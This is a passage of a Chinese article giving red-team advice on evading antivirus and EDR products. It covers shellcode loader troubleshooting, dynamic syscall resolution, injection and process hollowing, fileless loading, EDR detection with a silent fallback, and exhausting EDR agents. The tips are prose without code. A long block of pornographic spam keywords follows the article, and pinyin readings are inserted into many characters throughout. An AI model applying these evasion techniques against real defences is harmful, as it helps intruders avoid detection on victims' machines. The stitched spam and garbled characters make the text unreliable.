紅隊(duì)的應(yīng)對思路面對不斷升級的防御紅隊(duì)和滲透測試者的思路也需要從“單點(diǎn)技術(shù)繞過”轉(zhuǎn)向“體系化對抗”。技術(shù)層面持續(xù)迭代沒有永遠(yuǎn)免殺的技術(shù)。需要持續(xù)關(guān)注EDR的更新日志、研究論文并不斷更新自己的工具鏈。混合使用多種技術(shù)不要依賴單一技術(shù)。結(jié)合靜態(tài)加密、動(dòng)態(tài)解析、直接系統(tǒng)調(diào)用、進(jìn)程注入偽裝等多種手段增加分析復(fù)雜度。利用合法工具與“活”在土地上越來越多地使用操作系統(tǒng)自帶的管理工具如PsExec、WMI、PowerShell、Cobalt Strike的execute-assembly或簽名的第三方軟件如TeamViewer、AnyDesk來執(zhí)行操作。這種“Living-off-the-Land”的策略使得惡意行為隱藏在大量合法的管理流量中難以區(qū)分。研究底層與未文檔化接口深入研究Windows內(nèi)核、硬件虛擬化如HVCI、安全子系統(tǒng)如Credential Guard的細(xì)節(jié)尋找官方文檔未提及的接口或邏輯漏洞。但這需要極高的技術(shù)門檻和風(fēng)險(xiǎn)。戰(zhàn)術(shù)層面?zhèn)刹榕c規(guī)避在行動(dòng)前充分偵查目標(biāo)環(huán)境的安全產(chǎn)品針對性地選擇或定制載荷。避免使用在目標(biāo)行業(yè)已知被重點(diǎn)監(jiān)控的技術(shù)。分散與混淆將功能拆解使用多個(gè)階段、多個(gè)組件通過不同的渠道投遞和執(zhí)行降低單個(gè)組件的威脅分?jǐn)?shù)。模擬正常行為讓惡意代碼的行為節(jié)奏模仿正常軟件。例如在解密和執(zhí)行前加入隨機(jī)延遲模擬用戶思考或網(wǎng)絡(luò)延遲申請內(nèi)存的大小和模式符合正常軟件行為。7. 常見問題與排查技巧實(shí)錄在實(shí)際操作中你會(huì)遇到各種各樣的問題。這里記錄一些我踩過的坑和解決方法。問題1Shellcode執(zhí)行后進(jìn)程崩潰無任何現(xiàn)象。可能原因1Shellcode加密/解密錯(cuò)誤。這是最常見的問題。務(wù)必確保加密和解密算法、密鑰完全一致。在解密后、執(zhí)行前將內(nèi)存中的內(nèi)容寫入文件與原始Shellcode文件進(jìn)行二進(jìn)制比較??赡茉?內(nèi)存權(quán)限問題。確保申請的內(nèi)存具有PAGE_EXECUTE_READ或PAGE_EXECUTE_READWRITE權(quán)限。在調(diào)用Shellcode前可以使用VirtualQuery檢查內(nèi)存區(qū)域?qū)傩?。可能原?Shellcode本身不兼容。不同工具生成的Shellcode可能有不同的環(huán)境假設(shè)如棧對齊要求、API調(diào)用約定。特別是32位和64位Shellcode不能混用。確保Shellcode的架構(gòu)x86/x64與加載器編譯的架構(gòu)一致。排查技巧在調(diào)試器中如x64dbg單步跟入Shellcode。觀察在CreateThread或直接跳轉(zhuǎn)后第一條指令是否被正確執(zhí)行。檢查棧指針RSP是否合理。問題2直接系統(tǒng)調(diào)用Syscall在不同Windows版本上失效。原因系統(tǒng)調(diào)用號隨版本變化。硬編碼必然導(dǎo)致兼容性問題。解決方案必須實(shí)現(xiàn)系統(tǒng)調(diào)用號的動(dòng)態(tài)解析。常見方法是從磁盤或內(nèi)存中讀取本機(jī)的ntdll.dll。解析其PE結(jié)構(gòu)找到目標(biāo)函數(shù)如NtAllocateVirtualMemory的代碼段。在該函數(shù)代碼的開頭附近定位mov eax, SSN指令x64下可能是mov r10, rcx; mov eax, SSN從中提取出系統(tǒng)調(diào)用號SSN。將提取的SSN用于你自己的syscall存根。工具推薦可以使用像SysWhispers2或HellsGate/HalosGate這樣的開源項(xiàng)目它們已經(jīng)實(shí)現(xiàn)了健壯的動(dòng)態(tài)SSN解析。問題3加載器本身被檢測即使Shellcode是加密的。原因加載器的行為模式如連續(xù)的VirtualAlloc、WriteProcessMemory、CreateThread調(diào)用或靜態(tài)特征如字符串、導(dǎo)入函數(shù)被識(shí)別。解決方案混淆加載器使用OLLVM、Tigress等源碼混淆器或VMProtect、Themida等商業(yè)加殼工具對加載器二進(jìn)制進(jìn)行保護(hù)。注意選擇特征不明顯的殼。拆分行為將內(nèi)存申請、寫入、執(zhí)行的操作在時(shí)間上或邏輯上拆分開。例如先申請內(nèi)存過一段時(shí)間或等待某個(gè)事件后再寫入Shellcode再等待更長時(shí)間后才創(chuàng)建線程。使用更隱蔽的注入技術(shù)放棄CreateThread改用APC、線程劫持或進(jìn)程鏤空。無文件落地考慮完全不使用獨(dú)立的加載器EXE而是將加載邏輯寫成一段Shellcode通過PowerShell、VBS、Word宏等方式直接加載到內(nèi)存中執(zhí)行實(shí)現(xiàn)“無文件”攻擊。問題4在裝有高級EDR的機(jī)器上Shellcode執(zhí)行被阻斷但進(jìn)程未崩潰。原因EDR的行為檢測模塊攔截了敏感操作如遠(yuǎn)程線程創(chuàng)建、內(nèi)存屬性修改并采取了“終止操作但允許進(jìn)程繼續(xù)運(yùn)行”的溫和策略。排查與對抗檢查返回值仔細(xì)檢查每個(gè)敏感API的返回值EDR可能返回一個(gè)錯(cuò)誤碼如ACCESS_DENIED而非直接使進(jìn)程崩潰。嘗試降級技術(shù)如果直接系統(tǒng)調(diào)用被內(nèi)核層監(jiān)控嘗試回退到使用被Hook的用戶態(tài)API但通過更復(fù)雜的調(diào)用鏈或偽裝參數(shù)來繞過。探測EDR存在在執(zhí)行敏感操作前先嘗試探測EDR的存在如檢查特定驅(qū)動(dòng)、進(jìn)程、注冊表項(xiàng)。如果探測到則進(jìn)入“靜默模式”或執(zhí)行無害的備用邏輯。資源限制EDR的深度監(jiān)控消耗資源??梢試L試通過快速、大量地發(fā)起合法系統(tǒng)調(diào)用如反復(fù)打開/關(guān)閉文件來對EDR代理進(jìn)行“資源耗盡”攻擊以期在其繁忙時(shí)執(zhí)行惡意操作此方法成功率低且不道德僅作研究討論。這個(gè)領(lǐng)域沒有銀彈真正的免殺是技術(shù)、耐心和對攻防雙方深刻理解的結(jié)合。每一次成功的繞過都建立在對系統(tǒng)更深一層的認(rèn)知之上。保持學(xué)習(xí)謹(jǐn)慎測試永遠(yuǎn)不要在未經(jīng)授權(quán)的系統(tǒng)上進(jìn)行實(shí)踐。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
婷婷五月激情综合| 99热久久这里只有精品2010| 婷婷色色网| 无码人妻精品一区二区蜜桃色欲| 禁欲电影完整版在线播放| 九热精品| www五月| 五月丁香六月日逼| 狠狠色噜噜狠狠狠狠狠色综合久久| 天天天天天天噜| 精品9久| 天天插天天插天天插天天插| 99,色| 这里只有精品免费| 丁香五月天啪啪a日本| 婷婷五月天午夜激情影院| 蜜乳人妻一区二区三区| 国产片色| 涩五月丝袜婷婷| 色综合色婷色基地| 婷婷五月花| 5月丁香综合图区| 九洲一级A片| a网站免费观看| 26uuu亚洲色| 91久久国产自产拍夜夜91久久精品文字>91麻豆精品国产 | 深爱激情中文五月天av| 色婷婷在线视频观看| 天天插综合| 五月婷视频| 九九色图| 大香蕉人人网| 成人Av在线大片| 色噜噜狠狠一区二区三区| 啪啪婷婷五月天激情| 午夜微拍福利| 特黄三级又爽又粗又大| 久久婷婷五月天大香蕉| 996黄色片| 五月婷婷碰碰| 最近中文字幕2019视频1| 9久视频| 天天草天天日| 99热 免费| 9久热视频| 五月婷婷激情综合网| 女人天堂久久| 99综合| 亚洲国产精品五月天| 性爱五月婷| 99热综合| 开心五月婷婷| 超碰妻人人| 九月激情婷婷丁香| 色婷婷成人做爰A片免费看网站 | 深爱五月月天| 色五月婷激情| 丁香五月天激情AV| 激情五月少妇| 婷婷色综合| 另类图片色五月| 91操黄| 超碰免费成人| 亭亭玉月丁香| 久久久久久性爱视频| 操日视频| 色婷婷综合丁香五月天| 人人操操97| 丁香五月激情五月| 伊大人久久| 99操九九网| 久久草中文日韩欧美| 字幕网AV中文字幕| 五月婷婷色色| Y11111111111少妇电影院| 丁香婷婷老司机久操| 亚洲无AV在线中文字幕| 被强行糟蹋的女人A片| 久久无码成人| 国产亚洲成人综合| 99精品激情| 丁香婷婷五月激情综合| 亚洲第一色色色色| 五月天色综合| 五月婷婷丁香| 美女100%露全身无挡网站| www.一起草av| 六月丁香色色| 五月天激情影院| 天天爽夜夜爽夜夜爽精品| 久久性视频| 亚州操操| 五月伊人婷婷| 久久久WWW| 91超碰在线观看| 五月丁香激情综合| 大色鬼综合| 9热网站| 99ri精品在线观看| 99伊人性爱在线影院| 性视频久久| 97色婷婷成人综合在线观看| 久久少妇视频| 丁香五月天五码婷婷| 色婷婷五月天小说| 亚洲中文字幕在线观看| 五月天婷婷色播综合在线| 色九综合| 亚洲激情亚洲激情 | www狠狠com| 精品久久二6| 国产色五月| 五月天艹天天| 精品一二三区久久AAA片| 曰本aaaaaa丈片| 五月丁香日本片| 99精品这里只有免费视频 | 久久婷婷五月天激情四射| 五月网站| 五月综合视频| 国产性av| 婷婷五月天直播| 色久五月天| 久久婷婷亚洲| 色色婷婷婷丁香五月天| 色婷五月天综合网| 激情婷婷五月在线合集| 99这里都是精品6| 五月丁香在线| 91人人爽狠狠狠| 第四色网婷婷| 思思久久99| 99ri国产| 操逼毛片国语对白| 欧美25p| 91久久久久久| 无码成人AAAAA毛片AI换脸| 9 9热这里有精品| www.五月婷婷久久.com| 成功精品影院| 五月停性愛| 色 免费网站视频| 激情五月综合网| 99热久| 91要啪| 狠狠干五月天| 综合视频久久| 激情丁香五月天| 99re久久| 免费做A爰片77777| 婷婷丁香五月天在线| 99热只有这里有精品| 99热有精品在线观看| 日日婷婷不卡| 另类视频在线| 丁香五月激情婷婷| 女人天堂久久| 久久色五月天| 五月天停停日日| 丁香婷婷免费| 亚洲影院婷婷色| 丁香五月色欲| 久久色婷婷| 99ri视频| 国产丁香五月天婷婷| 国产欧美精品AAAAAA片| 人人草人| 婷婷色导航| 大香蕉手机视频| 五月天婷婷社区久久综合| 色五月涩涩婷婷| 超碰在线观看9| 9久国产精品| 嫩草视频。| 婷婷五月天香蕉| 国产中文字幕在线视频免费观看| 久久婷婷精品| 国产精品24r| 综合AV在线| 精品久久久中文字幕大豆网推荐理由| 69久久99精品久久久久婷婷| 丁香六月婷婷基地| 丁香五月人妻| www,五月丁,com| 99精品手机在线视频| 99这里只有精品视频| 爆乳熟女一区二区三区爆乳| 九九99九九精品免费 | 日韩五月天婷婷| 婷婷五月激情在线| 五月婷婷影院| 丁香婷婷基地| 9191avse| 日本三久久| 怡红院 久久| 色射影院| av在线免费网站| 婷婷开心五月| 99热99热在线观看| 日韩在线成人电影| 狠狠ri| 另类伊人婷婷| 婷婷射丁香| 日本久久综合| 色综合狠狠色| 日本久久色| 大香蕉天堂| 亚欧州精品视频| 超碰av在线| 91操操| 亚洲小视频免费播放| 国产精品激情AV久久久青桔| 日本色天堂| 天天色天天舔天天爱天天爽| 婷婷色中文| 色五月婷婷小说亚洲中文字幕组| 五月丁香六月婷精品视频| 婷婷综合日本| 婷婷国产五月天17c| 精品乱码久久久久| 性欧美日本| 婷婷涩五月天综合| 色XX综合网| www.色多多婷| 八戒青柠影视剧在线观看| 五月丁香好婷婷A片网| 欧美日本免费一道免费视频 | 日日噜噜久久婷婷五月天 | 婷婷中文在线| 大香蕉Av在线| 日韩AV中文字幕在线| 五月天婷婷久久| 日韩精品一品二区三区的使用体验| 在线综合婷婷| 桃色激情婷婷伊人网| 色综合久久天天综合网| 涩综合网| 色综合婷婷| 91操在线观看| 五月天天综合| 久久五月天色婷婷| 人妻综合网| 大香蕉久久久久久久久| 久久婷婷五月综合一| 超碰日韩成人| 天堂久久久久天堂网| 国产AV一区二区三区日韩| 天天干天天操天天拍| 99在线视频资源| 中文av网| 丁香六月色婷婷| 99re热在线视频观看| 五月婷婷官网色| 天天色综合图片| 色天天综合| 777精品成人a v久久| 99干视频| 先锋资源91| 六月丁香五月天| 五月天久久综合婷婷丁香| 久久婷婷婷婷伊人| 超碰1999| 日日爽日日| 久久99精品视频| 亚洲啪啪网| 亚洲偷| 日韩在线看AV| 久热伊人在91| 中文字幕在线日亚洲9| 超碰三级片| 日韩在线视频中文字幕| 99r久久这里只有精品| 色综合天天网| 五月天婷婷av| 亚洲综合久| 欧美99热| 欧美成人AAA片一区国产精品| 国产毛片欧美毛片久久久| 丁香五月婷婷啪啪| 91碰操| 99久久.www| 91久久综合亚洲噜噜成人在线 | 黑人糟蹋人妻HD中文字幕| 婷婷中文字幕| 国内久久婷婷| 如何安全看伊人婷婷| 99激情视频热| 亚洲色频| 五月第四色| 小视频久久久aaa| 五月天丁香成人| 五月花免费视频| 狠狠干五月丁香| 丁香五月综合无码趴趴| 色5月婷婷| 超碰伊人碰婷婷五月| 婷婷五月天首页激情| 精典久久| 天天夜天天色天天| www.91色| 野外99热| 婷婷六月婷婷| 天天综合色| 五月婷婷综合在线| 色婷婷先锋| 亚洲丁香五月天在线视频| 五月花在线观看视频| 91九色首页| 欧洲综合一区| 99色啊| 色色激情网| 五月丁香色婷婷婷基地| 激情五月丁香婷婷| 九九精品9| 国产精品电影| 久久激情网| 五月丁香婷婷啪啪| 色5月婷婷色| 婷婷狠狠五月综合| 丁香六月婷婷久久综合| 亚洲激情在线| 婷婷情色激情| 亚洲精品婷婷| 九九在线精点品| 天天干天天爽| 婷婷亚洲综合| 99久在线视频| 91九色PORNY大屁股| 九九色婷婷五月天| 丁香婷婷人妻| 丁香婷婷六月天| 五月J香蕉婷婷| 操操啪| 99热a片免| 激情五月婷婷| 色色9 9| 亚洲视频a| 26uuu成人网| 六月丁花香啪啪激情欧美| 九九热在线观看6| 五月婷在线观看| 色婷婷五月天av在线| 亚洲视频在线观看99| 超碰在线免费| 五月婷婷色情| 五月天大香蕉| 久久这里精彩免费在线观看| 日本色色色| 五月天色综合| 丁香六月色婷婷| 丁香九九九九| 婷婷久草| 色五月丁香总合网| 国产精品人成A片一区二区| 久9热| 婷婷丁香水多多视频| 伊人超碰| 婷婷久久五月| 六月成人网| 日韩AV成人电影| 天天操天天日天天爽| 丁香五月婷婷基地| 狠狠干总合| 国产亚洲成AV人片在线观黄桃| 3pAV| 五月婷婷玖玖综合玖玖爱| 久噜久噜| 欧美婷婷九月| 国产97色在线| 丁香色情五月天| 亚洲操操操| 99这里只有精品在线| 日本啪啪视频HD| 99视频精品全部免费观看| 中文字幕视频色婷婷| 日韩欧美骚货| 99re在线播放| 五月天婷婷婷| 激情av| 91操碰| 91在线视频观看午夜福利| 青青草原亚洲天堂| 色色无码日韩| 国内外色色色色色成人视频| 亚洲、欧美、国产另类笫二区| 99毛片| 久久久中文| 99热这里只有精| 伊人日日干| 激情综合九| 99在线69| 热久综合| 日日爽日日| 日韩肏屄网| 人人草人人爱| 天天色综合色| 久久新| 五月丁香婷婷综合| av狠狠操| 玖玖资源部在线播放| 香蕉婷婷五月| 超碰亚洲天堂| 天天天天天久久久久久| 九九久久综合| 91操在线| 国产精品激情AV久久久青桔| 久99热在线观看| 色情五月丁香婷婷网| 在线亚洲综合网| 丁香婷婷基地| 亚洲国产精品VA在线看黑人| 丁香婷婷人妻综合网| 九九色天堂| 五月婷在线| 天天狠狠六月婷丁香影院| 国产精品美女久久久久AV超清| 九 九九九AV| 婷婷五月天电影区小说区| 激情综合九月| 97碰碰人人视频| 99无码精品| 精品人妻久久久久久| 激情五月综合色婷婷| 4399伦理午夜| 91熟妇大香蕉| 中国女人做爰A片| 99热这里只有精品1025| 日韩一66精品| 琪琪色网在线| 欧洲综合色| 91男人资源站| 久久caop| 久久在线视频免费观看| 欧美黄色韩日网| 色色色区| av免费在线网站| 欧美午夜乱妇午夜福利| 五月婷婷六月丁香| 九九久久综合| 丁香激情婷婷网| 久久丁香| 9久久网| 色五月大| 激情综合五月.....| 大香蕉五月婷婷| www91久久| 丝雨一区二区| 精品操逼一区二区| 婷婷五月丁香人妻无码高清| 伊人超碰在线| 五月天婷婷亚洲| 久久男人网婷婷| 日本不卡高字幕在线2019| 六月色婷婷| 婷婷在线免费| XX色综合| 五月婷婷色| 五月天色丁香| 九九热在线视频| 丁香五月六月综合激情| 久青草影院| 五月天婷婷在线AN| 狠狠干在线视频| 五月婷婷丁香瑟瑟视频| 高清激情av在线观看| 丁香五月天堂网| 超碰在线9| 五月丁香成人| 综合激情网五月激情| 色狠狠狠干| 99热99ai| 99惹精品视频| 亚洲久久激情| 五月婷婷六月爱| 丁香婷婷五月天色播| 99热骚货| www.夜夜操.com| 婷婷娌伦网| 五月婷婷激情久久| 久婷| 免费三级黄色| 亚洲狠狠婷婷| 色色操| 久久婷婷成人综合色怡春院| 婷婷综合网站| 99re在线观看| 婷婷五月天色播| 久久婷婷五月| 99久高清视频| 无码se| 678五月丁香亚洲综合| 毛片新网地| 婷婷五月另类网站| 九九热这里| 午夜无码熟熟妇丰满人妻| 日比视频91| 91狠狠综合网| 午夜精品777| 日日.c| caop在线视频| 丰滿爆乳一区二区三区| 91黄操| 天天色综合色| 伊人激情综合网| 尤物一区二区| 91爱啪啪| 影音先锋777xfplay色资源网站| 久久久久亚洲AV成人无码电影| 夜夜撸夜夜骑| 国产激情在线观看| 人人干天天操五月丁香| 91.com男女操| 五月天丁香久久综合| 九九综舍久久| 五月天激情小说婷婷基地| 婷婷激情视频| 五月婷婷婷色| 九九热这里有精品23| 五月婷婷在线免费观看| 91丁香综合| 狠狠狠狠狠草| 九色自拍| 久久亭亭电影| 婷婷五月综合激情小说| 婷婷色在线| 国产原创视频91九色| 精品久色| 99免费热视频在线| 五月丁香六月婷婷激情四射| 2025最新亚洲激情在线| www.zbzhongsen.com| 99啪啪骑| 99久久九九| 久久久久久人妻| 非洲一级AV| 色五狠狠| 久99久视频精品| 99色6爱9热| 五月婷婷激情| 丁香五月成人| 99热亚洲| 久久久久亚洲AV成人无码电影| 67久久| 开心五激情网| 99热在线观看| 女人天堂av| www.yw尤物| 青青草轻轻操| 婷婷综合视频| 五月丁香花激情综合网| 亚洲五月天激情| 色啦啦视频| 亚洲婷婷丁香五月亚洲| 人妻丰满精品一区二区A片| 天天日日夜夜爽| 色五月激情综合网| 91超级碰碰碰| 99操视频| 五月婷婷成人网首页| 成人精品在线| 色婷婷六月激情| 亚洲色五月| 五月天婷五月天综合网小说首页-五月天激激婷婷大综合,婷婷亚洲综合五月天小说 | 五月丁香综合| 熟女人妻一区二区三区免费看| 日日噜人人人做人| 久久这里只有精品8| 7777激情基地| 99久久网站| 26uuu淫色| 91丨九色丨东北熟女| 五月激情丁香五月| 99在线免费视频| 岛国资源网| 色五月婷婷777| 日日肏天天操| www.99免费视频| 99re这里只有| 99精品国产热久久91色欲| 天天摸色吧天天摸色吧| 99色免费观看全部| 91狠狠色色丁香婷婷综合久久| 老师的粉嫩小又紧水又多A片视频| 99这里只有免费的小视频在线观看| 超碰AV在线| 五月婷婷中文网| 免费碰碰视频久| 思思 热 99| 午夜成人综合| 91丨九色丨东北熟女| 春色激情第四色| 中文AV网站| 婷婷久久免费| 干亚洲天堂| 五月停停大香蕉| 色五月播五月| 亚洲激情亚洲激情| 伊人啪啪网| 色欲久久久久久综合网综合网| 殴美日韩成人| 亚洲丁香婷婷五月天综合色| 亚洲AV成人无码精品| 国产婷婷综合| 婷婷丁香第一页| 五月婷婷之综合激情在线| 天堂中文国产| 五月丁香婷中文| 99久久精品国产色欲| 久久五月丁香| 中文AV网站| 无码四色色色| 丁香五月手机视频| www.五月天| 色色色色色色色色网站| 激情婷婷五月亚洲| 亭亭玉月丁香| 成人中文网| 久久九九@| 婷婷一本和五月丁香| 色九九九九| 午夜精品人妻无码一区二区三区| 婷婷久久精品| 久久99成人性爱高清视频| 欧美久久婷婷| 久久五月天免费网站| www.久久| 激情五月天丁香| 五月开心深深爱激情综合 | 外国碰视频网站97| 午夜在线成人网站免费观看| 思思99热| 成人av在线电影| 26uuu另类亚洲欧美日本一| 六月亚洲婷婷6月中文字幕| 先锋资源婷婷| 无码一区二区三区四区五区91c| tingting五月天亚洲| 国产SUV精品一区二区6| 狠狠色五月激情| 五月婷视频| 色五月在线播放| 久久久噜噜噜久久人妻| av人人操| 襙比视频| 久热2025无码| 久青青久| 欧美激情丁香五月| 99ri精品视频在线观看| 婷婷丁香五月天影院| 九月停停| 五月天大香焦| 久久婷婷青青| 精品九九九久| 99九九这里有免费视频| 天天揷综合网| 日本黄色三级片内射| 五月丁香综合激情| 99久久久久| 久久国产色| 五月丁香福利| 狠狠综合久久| 99热这里只| 色五月婷婷亚洲| 97碰| 婷婷丁香久久| 激情综合网五月激情| 99精品热| 久久怡红院| 99久热| www.色婷婷| 91精品久久久久久77777| 在线看片av| 色五月色五天色情网| 玖玖色综合网| 思思热在线观看| 91碰碰碰| 婷婷影院A成人| 综合 激情 婷婷| 99视频综合| 日本三级第一页| 东北熟女高潮99综合99| 婷五月天六| 九九综合网色全集| 五月婷在线| www.婷婷网| 欧美韩日AAA网站| 天天夜夜操| 五月丁香六月婷婷网| 五月丁香色婷婷久久| 久久性爱视频| A片试看120分钟做受视频红杏| 亚洲乱码日产精品BD| 激情五月天久久| 婷婷五月丁香综合桃花色网| 97色热| 五月天激情播播网| 五月婷久久在线| 涩婷婷五月天在线精品视频| 狠狠色丁香| 99ER热精品视频| 伦乱人妻| 狠狠色婷婷| 呦呦视频无码播放| 91九色欧美| 在线播放中文字幕| 国产综合A片| 婷婷九月亚洲| 色综合久久88色综合天天人守婷| av中文网站| 99人妻碰碰碰久久久久禁片| 五月天婷婷丁香人人操91| 97碰 在线视频观看| 超色欲天天| 99re99热| 五月婷婷亚洲天堂激情在线| 久久精品日| 精品导航在线x不卡| 91婷色| 3p日韩网站视频| 久久婷婷五月综合| 另类少妇人与禽zOZZ0性伦| 久久久久视剧HD| 99精品在线| 青青草原福利在线| www超碰| 国产亚洲av片| 伍月激情天| 久久综合影院 | 久久人妻熟女一区二区| 国产又色又爽又黄又免费| 丁香五月最新网址| 六月伊人婷婷| 色五月综合激情| 婷婷日韩| 五月婷婷香蕉| 99久久激情视频| 日本理论久久| 青青草六月丁香| 丁香六月在线| 噜噜色五月| 五月婷婷激情综合视频| 疯狂做受XXXX高潮A片动画| 日本系列_4页_777FP| 色情综合网| 风流少妇A片一区二区蜜桃| 久久在这里99| 色五月av| 色吊丝99| www,五月丁,com| 国产精品色色| 综合五月婷婷| 综合一区二区三区| 天色综合网| 久久激情五月天| 极品少妇XXXX精品少妇偷拍 | 亚洲婷婷视频| 五月丁香婷婷中文| 婷婷五月天网址| 五月天网站免费欧美| 亚洲超碰中文字幕| 国产精品A片| 欧美槡BBBB槡BBB少妇| site:xiongshengzz.com| 久久婷婷激情| 色欲av伊人久久大香线蕉影院| 久久久久这里只有精品| 日韩成人综合| 少妇综合网| 亚洲av网址| 色色色com| 黄色五月婷| 天天天天天天操| 人妻五月天激情开心网| 亚洲免费婷婷| 丁香五月黄色| 天天操婷婷| 精品久久9| 丁香五月久久| 激情综合婷婷五月| 99在线精品免费视频| 成人小说 五月天 婷婷| 国产真实乱对白精彩| 日韩AAA| 超碰日韩人妻在线| 色色免费网战视频| 91九色超碰正在播放| 五月激情网站| 激情五月天在线观看婷婷| 五月开心婷婷网| 色九九综合| 五月天天天综合| 欧美槡BBBB槡BBB少妇| 婷婷激情六月中文| 色天使久久综合| 99视频精品在线| 操逼六区| www.夜夜| SS丁香五月婷婷| 五月丁香最新| 超碰人人操人人干| 亚洲色五月天是什么| 两性婷婷丁香五月| 激情第四色| 丁香五月激情婷婷视频| AA片在线观看视频在线播放| 婷婷草| 婷婷六月激情| 激情内射人妻1区2区3区| 思思国产99| 婷婷色九月| 91精产品自偷自偷综合| 日日夜夜小色哥| 99亚洲精品视频| 99热免费| 五月婷婷综合久久| 色综合激情| 超碰在线网站9| 色噜噜狠狠一区二区三区| 中文无码婷婷| 91操黄| 人人操97| 大香蕉院线| 91AV婷婷| 97超级啪啪在线观看| 97碰碰视频在线观看免费| 激情五月天天| 婷婷久久免费| 伊人成人宗合网| 天天干,天天操,天天射| 中国丰满熟女A片免费观| 九九热在线99| 激情com| 丁香婷婷五月人体| h在线看免费版在线看| 成年人最刺激的综合网| 另类丁香五月天区图| 五月丁香久久呀| 天天久综合网永久入口18| 黄网免费观看| 五月婷婷丁香瑟瑟视频| 五月视频日本免费观看| 啪啪丁香五月| 玖玖@三月天天丁香婷婷| 人人干av| 99热碰碰| 日本va欧美va欧美va| 这里只有精品视频视频在线观看| 久久99三级在线视频| 激情99| 五月色网| 99热这里只有精品55| 婷婷丁香一月| 日本色频| 五月丁香啪啪综合| 一区二区三区四区牛| 欧美日韩中文国产一区发布| 五月停亭六月,六月停亭的英语| Www,五月天| 丁香婷婷射| 99er这里只有精品| 色情久久久| 岛国午夜视频| 91人妻九色大屁股| 免费无码毛片一区二区A片| 狠狠色综合网站久久久久| 天天干天天拍| 人人射人人高潮| 六月丁香五月激情婷婷| 99区视频| 婷婷欧美激情综合| 日韩九区| 综合久久影院| 丁香五月激情啪啪| 99热91| 中美日韩成人在线| 婷婷色综合av| 丁香五月天社区| www五月天com| 五月婷婷激情综合网 | 久久无码成人| 第四色在线观看| 99热久| 五月综合色| 99热99在线| 三级三久久线久久99久目本WW| 久久xxxx| 天天干天天干天天干天天干天| 亚洲视频二区| 成人在线视频网| 久久三级视频| 婷婷五月天久久| 天天拍天天操| 中文字幕网伦射乱中文| 亚洲精品字幕在线观看| 江苏少妇性BBB搡BBB爽爽爽| 影音先锋91网站在线观看| 懂色av粉嫩av蜜臀av| 草草色情综合网| 最新婷婷五月丁香| 91九色成人原创视频| 色99无码| 伊人婷婷综合| 九九热99re8热免费观看| 丁香婷婷五月激情综合| 天天肏夜夜肏| 日韩av在线免费观看| 丁香蜜臀黄色婷婷五月天| 婷婷久久大香蕉| 五月天综合| 粉嫩AV久久一区二区三区| 久久精品A片777777| 色五月美女| 亚洲无码成人网| 婷婷中文在线| 婷婷成人在线| 26uuu国产激情视频| 人人爱人人草| 九九这里都是精品| 少妇被躁爽到高潮无码文| 色婷婷狠狠久久综合五月| 1999天天操夜夜操| 色色热99| 五月丁香六月婷婷综合| 婷婷久久99| 疯狂做受XXXX高潮A片| 日碰日| 92国产福利| 99热这里只有精品在线免费| 九九精品在线网| 久久与婷婷| 精品夜夜澡人妻无码AV| 狠爱婷色| 丁香六月AV| 色情综合网| 99综合免费视频| 日韩av变天就操逼不卡区| 99久在线精品99re5热视频| 狠狠色婷婷7| 激情五月丁香六月| 人人播| AV网在线观看| 九九热这里只有精品首页| 亚艹艹| 可以免费观看的av| 成人网站高清无码| 九九99视频精品| 色色射| 色婷婷狠狠| 六月婷婷七月丁香| 五月丁香久久呀| 久操人妻| 激情五月天情色| 蜜桃婷婷五月| 五月丁香六月婷婷色日| 国产精品18久久久| 99热综合在线| 久热网在线视频| 思思99热| 色99在线看| 爱婷婷五月| 26UUU精品一区二区| 五月亭亭色| 3p日韩网站视频| 婷婷久久综合| 色涩影院六月丁香| 亚洲综合狠狠艹| 99久热| 丁香六月婷婷久久高清| 久色网五月| 99在线观看精品视频| 欧美操逼天堂| 婷婷五月天激情在线| 极品少妇高潮啪啪AV无码| 色五月综合激情| 99热这里只有精品4| 五月婷婷啪啪啪啪| 99在线视频免费| 九热视频| 色婷婷色情| 婷婷五月草| 五月婷狠狠| 能看的av片| 91Chinese在线| 级情九色| 九色视频91疯狂| 99re免费在线视频| 婷婷六月丁| 五月婷婷先锋| 激情综合色婷婷啪啪六月天| 极品人妻VIDEOSSS人妻| 五月天伊人av| 思思99热| 丁香婷婷六月婷婷六月婷婷六月婷婷| 99精品久久久| 伊人久久大香线蕉av一区| 66成人网| 丁香五月电影院在线观看| 五月婷婷丁香网| 伊人激情综合| 亚洲五月色| 91在线人| 五月婷婷天| 国产婷婷久久| 五月丁香激情综合网| 久久182| 五月丁香婷婷视频| 精品99视频| 久综合| 久久婷婷五月综合色奶水99啪| 激情五月天综合网| 色色com| 99热只有精品在线播放| 9久精品| 综合色天天| 日韩一级一片内射视频4K| 亚洲久久婷婷| 97操在线资源| 婷婷激情六月综合| 五月丁香六月婷| 丁香六月婷婷| 69午夜成人影片| 伊人九热| 5五月综合网亚洲| 51XX午夜影福利| 亚州操人在线视频| 婷婷六月婷婷| 91碰人人| 丁香五月天激情综合| 五月丁香六月激情综合| 天天精品视频免费观看| 激情五月婷婷欧美极品| 国产av网| 丁香婷婷色色| 亚洲日韩一页精品发布| 免费黄色AV| 欧美激情综合| 婷婷丁香成人在线视频| 玖玖婷婷五月天毛片| 热久久这里只有精品| 大香蕉五月天| 日韩少妇内射免费播放| 欧美25p| 色婷婷电影网| 中文字幕无码AV| 六月综合婷婷开心伊人| 丁香五月综合| 婷婷香蕉精品| 免费啪啪亚州视频| 五月在线婷色| 99热亚洲综合| 99色性爰网络| 俺去也在线www色官网| 五月天AV大香蕉| www.色综合| 婷婷伊人五月天| 99re99在线看| 涩丁香91| 99热这里只| 久久色这里只有精品| 九九久久99精品免费观看www| 亚洲精品又粗又大又爽A片| 九九99一区| 色99网站| 99这里只有| 九九操操| 五月天婷婷丁香成人网| 国产色网站| 婷婷五月激情片| 99超级碰碰| 青柠影视免费高清电视剧| 俺去也综合| 婷婷天天舔| 婷婷五月天亚洲综合| 无码少妇高潮喷水A片免费 | 五月婷五月婷伊人伊人五月婷| 天堂二区| 丁香六月综合激情| 天天干天干| 色色影院aaaav| 9l视频自拍九色9l视频在线观看| 日本色色影片| 人妻AV在线| 激情五月天小说|五月天开心激情网|亚洲精品国产自在现线|黄色五月天 | 五月天婷a在线| 成人丁香五月天| 五月天开心网| 思思热久久爱| 99热99思午夜精品| 色99在线视频| 久久久五月天网站| 婷婷五月丁香五月基地| 五月天婷婷小说| 手机旧版看人妻1025| 另类激情网| 手机看片日日做夜夜| 99热在线播放| 久久九九@| 亚洲色色五月| 99久久婷婷国产综合亚洲| 国产精品涩涩涩视频网站| 91丨九色丨大屁股| 